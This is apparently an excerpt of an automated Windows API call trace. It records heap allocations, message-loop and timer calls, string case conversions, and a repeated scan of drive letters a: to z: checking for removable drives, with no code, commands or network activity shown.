HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.872] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.872] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.873] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.873] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.874] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.874] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.874] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.874] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.874] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.874] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.874] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.875] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.875] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.875] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.875] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.876] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.876] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.876] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.876] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.876] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.877] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.877] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.877] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.877] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.878] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.879] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.879] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.879] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.879] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.880] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.880] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.880] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.880] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.880] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.881] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.881] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.881] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.881] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.882] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.882] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.882] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.883] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.883] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.883] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.883] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.883] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.883] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.884] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.884] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.884] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.884] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.884] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.885] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.885] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.885] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.885] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.885] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.886] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.886] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.886] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.886] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.887] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.887] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.887] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.887] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.888] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.888] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.888] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.888] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.888] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.888] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0215.889] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0215.889] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.890] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.890] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.890] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.890] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.890] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.891] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.891] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.891] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.891] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.891] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.891] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.892] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.892] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.892] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.892] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.892] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.894] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.894] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.894] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.895] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.895] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.895] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.895] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.896] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.896] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.896] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.896] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.896] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.897] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.897] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.898] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.928] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.928] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.928] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 